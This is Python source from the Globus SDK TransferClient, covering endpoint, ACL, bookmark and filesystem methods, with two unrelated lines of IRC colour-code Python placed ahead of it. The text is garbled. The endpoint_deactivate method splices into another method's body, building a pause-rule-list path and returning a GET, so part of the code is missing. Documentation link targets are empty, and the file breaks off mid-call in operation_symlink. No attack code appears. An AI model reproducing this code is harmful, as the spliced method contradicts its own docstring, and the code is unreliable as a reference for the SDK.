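    # %02d keeps the colour code two digits wide, so digits in the text survive
    return "".join("\003%02d%s" % (random.randint(2, 15), ch) for ch in text)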
automethodlist:: globus_sdk.TransferClient\n \"\"\"\n service_name = \"transfer\"\n base_path = \"/v0.10/\"\n error_class = TransferAPIError\n scopes = TransferScopes\n\n # Convenience methods, providing more pythonic access to common REST\n # resources\n\n #\n # Endpoint Management\n #\n\n def get_endpoint(\n self, endpoint_id: ID_PARAM_TYPE, query_params: Optional[Dict[str, Any]] = None\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``GET /endpoint/``\n\n :rtype: :class:`TransferResponse\n `\n\n **Examples**\n\n >>> tc = globus_sdk.TransferClient(...)\n >>> endpoint = tc.get_endpoint(endpoint_id)\n >>> print(\"Endpoint name:\",\n >>> endpoint[\"display_name\"] or endpoint[\"canonical_name\"])\n\n **External Documentation**\n\n See\n `Get Endpoint by ID \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(f\"TransferClient.get_endpoint({endpoint_id_s})\")\n path = self.qjoin_path(\"endpoint\", endpoint_id_s)\n return self.get(path, query_params=query_params)\n\n def update_endpoint(\n self,\n endpoint_id: ID_PARAM_TYPE,\n data,\n query_params: Optional[Dict[str, Any]] = None,\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``PUT /endpoint/``\n\n :rtype: :class:`TransferResponse\n `\n\n **Examples**\n\n >>> tc = globus_sdk.TransferClient(...)\n >>> epup = dict(display_name=\"My New Endpoint Name\",\n >>> description=\"Better Description\")\n >>> update_result = tc.update_endpoint(endpoint_id, epup)\n\n **External Documentation**\n\n See\n `Update Endpoint by ID \\\n `_\n in the REST documentation for details.\n \"\"\"\n if data.get(\"myproxy_server\"):\n if data.get(\"oauth_server\"):\n raise exc.GlobusSDKUsageError(\n \"an endpoint cannot be reconfigured to use multiple \"\n \"identity providers for activation; specify either \"\n \"MyProxy or OAuth, not both\"\n )\n else:\n data[\"oauth_server\"] = None\n elif data.get(\"oauth_server\"):\n data[\"myproxy_server\"] = None\n\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(f\"TransferClient.update_endpoint({endpoint_id_s}, ...)\")\n path = self.qjoin_path(\"endpoint\", endpoint_id_s)\n return self.put(path, data=data, query_params=query_params)\n\n def create_endpoint(self, data) -> response.GlobusHTTPResponse:\n \"\"\"\n ``POST /endpoint/``\n\n :rtype: :class:`TransferResponse\n `\n\n **Examples**\n\n >>> tc = globus_sdk.TransferClient(...)\n >>> ep_data = {\n >>> \"DATA_TYPE\": \"endpoint\",\n >>> \"display_name\": display_name,\n >>> \"DATA\": [\n >>> {\n >>> \"DATA_TYPE\": \"server\",\n >>> \"hostname\": \"gridftp.example.edu\",\n >>> },\n >>> ],\n >>> }\n >>> create_result = tc.create_endpoint(ep_data)\n >>> endpoint_id = create_result[\"id\"]\n\n **External Documentation**\n\n See\n `Create endpoint \\\n `_\n in the REST documentation for details.\n \"\"\"\n if data.get(\"myproxy_server\") and data.get(\"oauth_server\"):\n raise exc.GlobusSDKUsageError(\n \"an endpoint cannot be created using multiple identity \"\n \"providers for activation; specify either MyProxy or OAuth, \"\n \"not both\"\n )\n\n log.info(\"TransferClient.create_endpoint(...)\")\n return self.post(\"endpoint\", data=data)\n\n def delete_endpoint(\n self, endpoint_id: ID_PARAM_TYPE\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``DELETE /endpoint/``\n\n :rtype: :class:`TransferResponse\n `\n\n **Examples**\n\n >>> tc = globus_sdk.TransferClient(...)\n >>> delete_result = tc.delete_endpoint(endpoint_id)\n\n **External Documentation**\n\n See\n `Delete endpoint by id \\\n `_\n in the 
REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(f\"TransferClient.delete_endpoint({endpoint_id_s})\")\n path = self.qjoin_path(\"endpoint\", endpoint_id_s)\n return self.delete(path)\n\n @paging.has_paginator(\n paging.HasNextPaginator,\n items_key=\"DATA\",\n get_page_size=_get_page_size,\n max_total_results=1000,\n page_size=100,\n )\n def endpoint_search(\n self,\n filter_fulltext: Optional[str] = None,\n filter_scope: Optional[str] = None,\n filter_owner_id: Optional[str] = None,\n filter_host_endpoint: Optional[ID_PARAM_TYPE] = None,\n filter_non_functional: Optional[bool] = None,\n limit: Optional[int] = None,\n offset: Optional[int] = None,\n query_params: Optional[Dict[str, Any]] = None,\n ) -> IterableTransferResponse:\n r\"\"\"\n .. parsed-literal::\n\n GET /endpoint_search\\\n ?filter_fulltext=&filter_scope=\n\n :param filter_fulltext: The string to use in a full text search on endpoints.\n Effectively, the \"search query\" which is being requested. May be omitted\n with specific ``filter_scope`` values.\n :type filter_fulltext: str, optional\n :param filter_scope: A \"scope\" within which to search for endpoints. This must\n be one of the limited and known names known to the service, which can be\n found documented in the **External Documentation** below. Defaults to\n searching all endpoints (in which case ``filter_fulltext`` is required)\n :type filter_scope: str, optional\n :param filter_owner_id: Limit search to endpoints owned by the specified Globus\n Auth identity. Conflicts with scopes 'my-endpoints', 'my-gcp-endpoints', and\n 'shared-by-me'.\n :type filter_owner_id: str, optional\n :param filter_host_endpoint: Limit search to endpoints hosted by the specified\n endpoint. May cause BadRequest or PermissionDenied errors if the endpoint ID\n given is not valid for this operation.\n :type filter_host_endpoint: str, optional\n :param filter_non_functional: Limit search to endpoints which have the\n 'non_functional' flag set to True or False.\n :type filter_non_functional: bool, optional\n :param limit: limit the number of results\n :type limit: int, optional\n :param offset: offset used in paging\n :type offset: int, optional\n :param query_params: Any additional parameters will be passed through\n as query params.\n :type query_params: dict, optional\n :rtype: :class:`IterableTransferResponse\n `\n\n **Examples**\n\n Search for a given string as a fulltext search:\n\n >>> tc = globus_sdk.TransferClient(...)\n >>> for ep in tc.endpoint_search('String to search for!'):\n >>> print(ep['display_name'])\n\n Search for a given string, but only on endpoints that you own:\n\n >>> for ep in tc.endpoint_search('foo', filter_scope='my-endpoints'):\n >>> print('{0} has ID {1}'.format(ep['display_name'], ep['id']))\n\n It is important to be aware that the Endpoint Search API limits\n you to 1000 results for any search query.\n\n **External Documentation**\n\n For additional information, see `Endpoint Search\n `_.\n in the REST documentation for details.\n \"\"\"\n if query_params is None:\n query_params = {}\n if filter_scope is not None:\n query_params[\"filter_scope\"] = filter_scope\n if filter_fulltext is not None:\n query_params[\"filter_fulltext\"] = filter_fulltext\n if filter_owner_id is not None:\n query_params[\"filter_owner_id\"] = filter_owner_id\n if filter_host_endpoint is not None: # convert to str (may be UUID)\n query_params[\"filter_host_endpoint\"] = utils.safe_stringify(\n filter_host_endpoint\n )\n if 
filter_non_functional is not None: # convert to int (expect bool input)\n query_params[\"filter_non_functional\"] = 1 if filter_non_functional else 0\n if limit is not None:\n query_params[\"limit\"] = limit\n if offset is not None:\n query_params[\"offset\"] = offset\n log.info(f\"TransferClient.endpoint_search({query_params})\")\n return IterableTransferResponse(\n self.get(\"endpoint_search\", query_params=query_params)\n )\n\n def endpoint_autoactivate(\n self,\n endpoint_id: ID_PARAM_TYPE,\n if_expires_in: Optional[int] = None,\n query_params: Optional[Dict[str, Any]] = None,\n ) -> response.GlobusHTTPResponse:\n r\"\"\"\n ``POST /endpoint//autoactivate``\n\n :rtype: :class:`TransferResponse\n `\n\n The following example will try to \"auto\" activate the endpoint\n using a credential available from another endpoint or sign in by\n the user with the same identity provider, but only if the\n endpoint is not already activated or going to expire within an\n hour (3600 seconds). If that fails, direct the user to the\n globus website to perform activation:\n\n **Examples**\n\n >>> tc = globus_sdk.TransferClient(...)\n >>> r = tc.endpoint_autoactivate(ep_id, if_expires_in=3600)\n >>> while (r[\"code\"] == \"AutoActivationFailed\"):\n >>> print(\"Endpoint requires manual activation, please open \"\n >>> \"the following URL in a browser to activate the \"\n >>> \"endpoint:\")\n >>> print(\"https://app.globus.org/file-manager?origin_id=%s\"\n >>> % ep_id)\n >>> input(\"Press ENTER after activating the endpoint:\")\n >>> r = tc.endpoint_autoactivate(ep_id, if_expires_in=3600)\n\n This is the recommended flow for most thick client applications,\n because many endpoints require activation via OAuth MyProxy,\n which must be done in a browser anyway. Web based clients can\n link directly to the URL.\n\n You also might want messaging or logging depending on why and how the\n operation succeeded, in which case you'll need to look at the value of\n the \"code\" field and either decide on your own messaging or use the\n response's \"message\" field.\n\n >>> tc = globus_sdk.TransferClient(...)\n >>> r = tc.endpoint_autoactivate(ep_id, if_expires_in=3600)\n >>> if r['code'] == 'AutoActivationFailed':\n >>> print('Endpoint({}) Not Active! Error! 
Source message: {}'\n >>> .format(ep_id, r['message']))\n >>> sys.exit(1)\n >>> elif r['code'] == 'AutoActivated.CachedCredential':\n >>> print('Endpoint({}) autoactivated using a cached credential.'\n >>> .format(ep_id))\n >>> elif r['code'] == 'AutoActivated.GlobusOnlineCredential':\n >>> print(('Endpoint({}) autoactivated using a built-in Globus '\n >>> 'credential.').format(ep_id))\n >>> elif r['code'] == 'AlreadyActivated':\n >>> print('Endpoint({}) already active until at least {}'\n >>> .format(ep_id, 3600))\n\n **External Documentation**\n\n See\n `Autoactivate endpoint \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n if query_params is None:\n query_params = {}\n if if_expires_in is not None:\n query_params[\"if_expires_in\"] = if_expires_in\n log.info(f\"TransferClient.endpoint_autoactivate({endpoint_id_s})\")\n path = self.qjoin_path(\"endpoint\", endpoint_id_s, \"autoactivate\")\n return self.post(path, query_params=query_params)\n\n def endpoint_deactivate(\n self, endpoint_id: ID_PARAM_TYPE, query_params: Optional[Dict[str, Any]] = None\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``POST /endpoint//deactivate``\n\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Deactivate endpoint \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(f\"TransferClient.endpoint_deactivate({endpoint_id_s})\")\n 
path = self.qjoin_path(\n \"endpoint\", endpoint_id_s, \"my_effective_pause_rule_list\"\n )\n return IterableTransferResponse(self.get(path, query_params=query_params))\n\n # Shared Endpoints\n\n def my_shared_endpoint_list(\n self, endpoint_id: ID_PARAM_TYPE, query_params: Optional[Dict[str, Any]] = None\n ) -> IterableTransferResponse:\n \"\"\"\n ``GET /endpoint//my_shared_endpoint_list``\n\n :rtype: :class:`IterableTransferResponse\n `\n\n **External Documentation**\n\n See\n `Get shared endpoint list \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(f\"TransferClient.my_shared_endpoint_list({endpoint_id_s}, ...)\")\n path = self.qjoin_path(\"endpoint\", endpoint_id_s, \"my_shared_endpoint_list\")\n return IterableTransferResponse(self.get(path, query_params=query_params))\n\n @paging.has_paginator(\n paging.NextTokenPaginator,\n items_key=\"shared_endpoints\",\n )\n def get_shared_endpoint_list(\n self,\n endpoint_id: ID_PARAM_TYPE,\n max_results: Optional[int] = None,\n next_token: Optional[str] = None,\n query_params: Optional[Dict[str, Any]] = None,\n ) -> IterableTransferResponse:\n \"\"\"\n ``GET /endpoint//shared_endpoint_list``\n\n :param max_results: cap to the number of results\n :type max_results: int, optional\n :param next_token: token used for paging\n :type next_token: str, optional\n :param query_params: Any additional parameters will be passed through\n as query params.\n :type query_param: dict, optional\n\n\n :rtype: :class:`IterableTransferResponse\n `\n\n **External Documentation**\n\n See\n `Get shared endpoint list \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(f\"TransferClient.get_shared_endpoint_list({endpoint_id_s}, ...)\")\n path = self.qjoin_path(\"endpoint\", endpoint_id_s, \"shared_endpoint_list\")\n if query_params is None:\n query_params = {}\n if max_results is not None:\n query_params[\"max_results\"] = str(max_results)\n if next_token is not None:\n query_params[\"next_token\"] = str(next_token)\n return IterableTransferResponse(\n self.get(path, query_params=query_params), iter_key=\"shared_endpoints\"\n )\n\n def create_shared_endpoint(self, data):\n \"\"\"\n ``POST /shared_endpoint``\n\n :param data: A python dict representation of a ``shared_endpoint`` document\n :type data: dict\n :rtype: :class:`TransferResponse\n `\n\n **Examples**\n\n >>> tc = globus_sdk.TransferClient(...)\n >>> shared_ep_data = {\n >>> \"DATA_TYPE\": \"shared_endpoint\",\n >>> \"host_endpoint\": host_endpoint_id,\n >>> \"host_path\": host_path,\n >>> \"display_name\": display_name,\n >>> # optionally specify additional endpoint fields\n >>> \"description\": \"my test share\"\n >>> }\n >>> create_result = tc.create_shared_endpoint(shared_ep_data)\n >>> endpoint_id = create_result[\"id\"]\n\n **External Documentation**\n\n See\n `Create shared endpoint \\\n `_\n in the REST documentation for details.\n \"\"\"\n log.info(\"TransferClient.create_shared_endpoint(...)\")\n return self.post(\"shared_endpoint\", data=data)\n\n # Endpoint servers\n\n def endpoint_server_list(\n self, endpoint_id: ID_PARAM_TYPE, query_params: Optional[Dict[str, Any]] = None\n ) -> IterableTransferResponse:\n \"\"\"\n ``GET /endpoint//server_list``\n\n :rtype: :class:`IterableTransferResponse\n `\n\n **External Documentation**\n\n See\n `Get endpoint server list \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = 
utils.safe_stringify(endpoint_id)\n log.info(f\"TransferClient.endpoint_server_list({endpoint_id_s}, ...)\")\n path = self.qjoin_path(\"endpoint\", endpoint_id_s, \"server_list\")\n return IterableTransferResponse(self.get(path, query_params=query_params))\n\n def get_endpoint_server(\n self,\n endpoint_id: ID_PARAM_TYPE,\n server_id,\n query_params: Optional[Dict[str, Any]] = None,\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``GET /endpoint//server/``\n\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Get endpoint server by id\\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(\n \"TransferClient.get_endpoint_server(%s, %s, ...)\", endpoint_id_s, server_id\n )\n path = self.qjoin_path(\"endpoint\", endpoint_id_s, \"server\", str(server_id))\n return self.get(path, query_params=query_params)\n\n def add_endpoint_server(\n self, endpoint_id: ID_PARAM_TYPE, server_data: Dict\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``POST /endpoint//server``\n\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Add endpoint server \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(f\"TransferClient.add_endpoint_server({endpoint_id_s}, ...)\")\n path = self.qjoin_path(\"endpoint\", endpoint_id_s, \"server\")\n return self.post(path, data=server_data)\n\n def update_endpoint_server(\n self, endpoint_id: ID_PARAM_TYPE, server_id, server_data: Dict\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``PUT /endpoint//server/``\n\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Update endpoint server by id \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(\n \"TransferClient.update_endpoint_server(%s, %s, ...)\",\n endpoint_id_s,\n server_id,\n )\n path = self.qjoin_path(\"endpoint\", endpoint_id_s, \"server\", str(server_id))\n return self.put(path, data=server_data)\n\n def delete_endpoint_server(\n self, endpoint_id: ID_PARAM_TYPE, server_id\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``DELETE /endpoint//server/``\n\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Delete endpoint server by id \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(\n \"TransferClient.delete_endpoint_server(%s, %s)\", endpoint_id_s, server_id\n )\n path = self.qjoin_path(\"endpoint\", endpoint_id_s, \"server\", str(server_id))\n return self.delete(path)\n\n #\n # Roles\n #\n\n def endpoint_role_list(\n self, endpoint_id: ID_PARAM_TYPE, query_params: Optional[Dict[str, Any]] = None\n ) -> IterableTransferResponse:\n \"\"\"\n ``GET /endpoint//role_list``\n\n :rtype: :class:`IterableTransferResponse\n `\n\n **External Documentation**\n\n See\n `Get list of endpoint roles \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(f\"TransferClient.endpoint_role_list({endpoint_id_s}, ...)\")\n path = self.qjoin_path(\"endpoint\", endpoint_id_s, \"role_list\")\n return IterableTransferResponse(self.get(path, query_params=query_params))\n\n def add_endpoint_role(\n self, endpoint_id: ID_PARAM_TYPE, role_data: Dict\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``POST /endpoint//role``\n\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Create 
endpoint role \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(f\"TransferClient.add_endpoint_role({endpoint_id_s}, ...)\")\n path = self.qjoin_path(\"endpoint\", endpoint_id_s, \"role\")\n return self.post(path, data=role_data)\n\n def get_endpoint_role(\n self,\n endpoint_id: ID_PARAM_TYPE,\n role_id,\n query_params: Optional[Dict[str, Any]] = None,\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``GET /endpoint//role/``\n\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Get endpoint role by id \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(f\"TransferClient.get_endpoint_role({endpoint_id_s}, {role_id}, ...)\")\n path = self.qjoin_path(\"endpoint\", endpoint_id_s, \"role\", role_id)\n return self.get(path, query_params=query_params)\n\n def delete_endpoint_role(\n self, endpoint_id: ID_PARAM_TYPE, role_id\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``DELETE /endpoint//role/``\n\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Delete endpoint role by id \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(f\"TransferClient.delete_endpoint_role({endpoint_id_s}, {role_id})\")\n path = self.qjoin_path(\"endpoint\", endpoint_id_s, \"role\", role_id)\n return self.delete(path)\n\n #\n # ACLs\n #\n\n def endpoint_acl_list(\n self, endpoint_id: ID_PARAM_TYPE, query_params: Optional[Dict[str, Any]] = None\n ) -> IterableTransferResponse:\n \"\"\"\n ``GET /endpoint//access_list``\n\n :rtype: :class:`IterableTransferResponse\n `\n\n **External Documentation**\n\n See\n `Get list of access rules \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(f\"TransferClient.endpoint_acl_list({endpoint_id_s}, ...)\")\n path = self.qjoin_path(\"endpoint\", endpoint_id_s, \"access_list\")\n return IterableTransferResponse(self.get(path, query_params=query_params))\n\n def get_endpoint_acl_rule(\n self,\n endpoint_id: ID_PARAM_TYPE,\n rule_id,\n query_params: Optional[Dict[str, Any]] = None,\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``GET /endpoint//access/``\n\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Get access rule by id \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(\n \"TransferClient.get_endpoint_acl_rule(%s, %s, ...)\", endpoint_id_s, rule_id\n )\n path = self.qjoin_path(\"endpoint\", endpoint_id_s, \"access\", rule_id)\n return self.get(path, query_params=query_params)\n\n def add_endpoint_acl_rule(\n self, endpoint_id: ID_PARAM_TYPE, rule_data: Dict\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``POST /endpoint//access``\n\n :param endpoint_id: ID of endpoint to which to add the acl\n :type endpoint_id: str\n :param rule_data: A python dict representation of an ``access`` document\n :type rule_data: dict\n :rtype: :class:`TransferResponse\n `\n\n **Examples**\n\n >>> tc = globus_sdk.TransferClient(...)\n >>> rule_data = {\n >>> \"DATA_TYPE\": \"access\",\n >>> \"principal_type\": \"identity\",\n >>> \"principal\": identity_id,\n >>> \"path\": \"/dataset1/\",\n >>> \"permissions\": \"rw\",\n >>> }\n >>> result = tc.add_endpoint_acl_rule(endpoint_id, rule_data)\n >>> rule_id = result[\"access_id\"]\n\n Note that if this rule is being created on a 
shared endpoint\n the \"path\" field is relative to the \"host_path\" of the shared endpoint.\n\n **External Documentation**\n\n See\n `Create access rule \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(f\"TransferClient.add_endpoint_acl_rule({endpoint_id_s}, ...)\")\n path = self.qjoin_path(\"endpoint\", endpoint_id_s, \"access\")\n return self.post(path, data=rule_data)\n\n def update_endpoint_acl_rule(\n self, endpoint_id: ID_PARAM_TYPE, rule_id, rule_data: Dict\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``PUT /endpoint//access/``\n\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Update access rule \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(\n \"TransferClient.update_endpoint_acl_rule(%s, %s, ...)\",\n endpoint_id_s,\n rule_id,\n )\n path = self.qjoin_path(\"endpoint\", endpoint_id_s, \"access\", rule_id)\n return self.put(path, data=rule_data)\n\n def delete_endpoint_acl_rule(\n self, endpoint_id: ID_PARAM_TYPE, rule_id\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``DELETE /endpoint//access/``\n\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Delete access rule \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(\n \"TransferClient.delete_endpoint_acl_rule(%s, %s)\", endpoint_id_s, rule_id\n )\n path = self.qjoin_path(\"endpoint\", endpoint_id_s, \"access\", rule_id)\n return self.delete(path)\n\n #\n # Bookmarks\n #\n\n def bookmark_list(\n self, query_params: Optional[Dict[str, Any]] = None\n ) -> IterableTransferResponse:\n \"\"\"\n ``GET /bookmark_list``\n\n :rtype: :class:`IterableTransferResponse\n `\n\n **External Documentation**\n\n See\n `Get list of bookmarks \\\n `_\n in the REST documentation for details.\n \"\"\"\n log.info(f\"TransferClient.bookmark_list({query_params})\")\n return IterableTransferResponse(\n self.get(\"bookmark_list\", query_params=query_params)\n )\n\n def create_bookmark(self, bookmark_data: Dict) -> response.GlobusHTTPResponse:\n \"\"\"\n ``POST /bookmark``\n\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Create bookmark \\\n `_\n in the REST documentation for details.\n \"\"\"\n log.info(f\"TransferClient.create_bookmark({bookmark_data})\")\n return self.post(\"bookmark\", data=bookmark_data)\n\n def get_bookmark(\n self, bookmark_id: ID_PARAM_TYPE, query_params: Optional[Dict[str, Any]] = None\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``GET /bookmark/``\n\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Get bookmark by id \\\n `_\n in the REST documentation for details.\n \"\"\"\n bookmark_id_s = utils.safe_stringify(bookmark_id)\n log.info(f\"TransferClient.get_bookmark({bookmark_id_s})\")\n path = self.qjoin_path(\"bookmark\", bookmark_id_s)\n return self.get(path, query_params=query_params)\n\n def update_bookmark(\n self, bookmark_id: ID_PARAM_TYPE, bookmark_data: Dict\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``PUT /bookmark/``\n\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Update bookmark \\\n `_\n in the REST documentation for details.\n \"\"\"\n bookmark_id_s = utils.safe_stringify(bookmark_id)\n log.info(f\"TransferClient.update_bookmark({bookmark_id_s})\")\n path = self.qjoin_path(\"bookmark\", bookmark_id_s)\n return self.put(path, 
data=bookmark_data)\n\n    def delete_bookmark(\n        self, bookmark_id: ID_PARAM_TYPE\n    ) -> response.GlobusHTTPResponse:\n        \"\"\"\n        ``DELETE /bookmark/``\n\n        :rtype: :class:`TransferResponse\n                `\n\n        **External Documentation**\n\n        See\n        `Delete bookmark by id\\\n        `_\n        in the REST documentation for details.\n        \"\"\"\n        bookmark_id_s = utils.safe_stringify(bookmark_id)\n        log.info(f\"TransferClient.delete_bookmark({bookmark_id_s})\")\n        path = self.qjoin_path(\"bookmark\", bookmark_id_s)\n        return self.delete(path)\n\n    #\n    # Synchronous Filesys Operations\n    #\n\n    def operation_ls(\n        self,\n        endpoint_id: ID_PARAM_TYPE,\n        path: Optional[str] = None,\n        show_hidden: Optional[bool] = None,\n        orderby: Optional[Union[str, List[str]]] = None,\n        # note: this parameter shadows the builtin `filter`, which is okay here\n        filter: Optional[str] = None,\n        query_params: Optional[Dict[str, Any]] = None,\n    ) -> IterableTransferResponse:\n        \"\"\"\n        ``GET /operation/endpoint//ls``\n\n        :param path: Path to a directory on the endpoint to list\n        :type path: str, optional\n        :param show_hidden: Show hidden files (names beginning in dot).\n            Defaults to true.\n        :type show_hidden: bool, optional\n        :param orderby: One or more order-by options. Each option is\n            either a field name or a field name followed by a space and 'ASC' or 'DESC'\n            for ascending or descending.\n        :type orderby: str or list of str, optional\n        :param filter: Only return file documents that match these filter clauses. For\n            the filter syntax, see the **External Documentation** linked below.\n        :type filter: str, optional\n        :rtype: :class:`IterableTransferResponse\n                `\n\n        **Examples**\n\n        List with a path:\n\n        >>> tc = globus_sdk.TransferClient(...)\n        >>> for entry in tc.operation_ls(ep_id, path=\"/~/project1/\"):\n        >>>     print(entry[\"name\"], entry[\"type\"])\n\n        List with explicit ordering:\n\n        >>> tc = globus_sdk.TransferClient(...)\n        >>> for entry in tc.operation_ls(\n        >>>     ep_id,\n        >>>     path=\"/~/project1/\",\n        >>>     orderby=[\"type\", \"name\"]\n        >>> ):\n        >>>     print(entry[\"name\"], entry[\"type\"])\n\n        **External Documentation**\n\n        See\n        `List Directory Contents \\\n        `_\n        in the REST documentation for details.\n        \"\"\"\n        endpoint_id_s = utils.safe_stringify(endpoint_id)\n\n        if query_params is None:\n            query_params = {}\n        if path is not None:\n            query_params[\"path\"] = path\n        if show_hidden is not None:\n            query_params[\"show_hidden\"] = 1 if show_hidden else 0\n        if orderby is not None:\n            if isinstance(orderby, str):\n                query_params[\"orderby\"] = orderby\n            else:\n                query_params[\"orderby\"] = \",\".join(orderby)\n        if filter is not None:\n            query_params[\"filter\"] = filter\n\n        log.info(f\"TransferClient.operation_ls({endpoint_id_s}, {query_params})\")\n        req_path = self.qjoin_path(\"operation/endpoint\", endpoint_id_s, \"ls\")\n        return IterableTransferResponse(self.get(req_path, query_params=query_params))\n\n    def operation_mkdir(\n        self,\n        endpoint_id: ID_PARAM_TYPE,\n        path,\n        query_params: Optional[Dict[str, Any]] = None,\n    ) -> response.GlobusHTTPResponse:\n        \"\"\"\n        ``POST /operation/endpoint//mkdir``\n\n        :rtype: :class:`TransferResponse\n                `\n\n        **Examples**\n\n        >>> tc = globus_sdk.TransferClient(...)\n        >>> tc.operation_mkdir(ep_id, path=\"/~/newdir/\")\n\n        **External Documentation**\n\n        See\n        `Make Directory \\\n        `_\n        in the REST documentation for details.\n        \"\"\"\n        endpoint_id_s = utils.safe_stringify(endpoint_id)\n        path = utils.safe_stringify(path)\n        log.info(\n            \"TransferClient.operation_mkdir({}, {}, {})\".format(\n                endpoint_id_s, path, query_params\n            )\n        )\n        
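# The request body is a Transfer \"mkdir\" document; POSTing it to the\n        # operation resource creates the directory on the endpoint.\n        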
resource_path = self.qjoin_path(\"operation/endpoint\", endpoint_id_s, \"mkdir\")\n json_body = {\"DATA_TYPE\": \"mkdir\", \"path\": path}\n return self.post(resource_path, data=json_body, query_params=query_params)\n\n def operation_rename(\n self,\n endpoint_id: ID_PARAM_TYPE,\n oldpath,\n newpath,\n query_params: Optional[Dict[str, Any]] = None,\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``POST /operation/endpoint//rename``\n\n :rtype: :class:`TransferResponse\n `\n\n **Examples**\n\n >>> tc = globus_sdk.TransferClient(...)\n >>> tc.operation_rename(ep_id, oldpath=\"/~/file1.txt\",\n >>> newpath=\"/~/project1data.txt\")\n\n **External Documentation**\n\n See\n `Rename \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n oldpath = utils.safe_stringify(oldpath)\n newpath = utils.safe_stringify(newpath)\n log.info(\n \"TransferClient.operation_rename({}, {}, {}, {})\".format(\n endpoint_id_s, oldpath, newpath, query_params\n )\n )\n resource_path = self.qjoin_path(\"operation/endpoint\", endpoint_id_s, \"rename\")\n json_body = {\"DATA_TYPE\": \"rename\", \"old_path\": oldpath, \"new_path\": newpath}\n return self.post(resource_path, data=json_body, query_params=query_params)\n\n def operation_symlink(\n self,\n endpoint_id: ID_PARAM_TYPE,\n symlink_target,\n path,\n query_params: Optional[Dict[str, Any]] = None,\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``POST /operation/endpoint//symlink``\n\n :rtype: :class:`TransferResponse\n `\n\n The ``path`` is the name of the symlink, and the ``symlink_target`` is\n the path referenced by the symlink.\n\n **Examples**\n\n >>> tc = globus_sdk.TransferClient(...)\n >>> tc.operation_symlink(ep_id, symlink_target=\"/~/file1.txt\",\n >>> path=\"/~/link-to-file1.txt\")\n\n **External Documentation**\n\n See\n `Symlink \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n symlink_target = utils.safe_stringify(symlink_target)\n path = utils.safe_stringify(path)\n log.info(\n \"TransferClient.operation_symlink({}, {}, {}, {})\".format(\n endpoint_id_s, 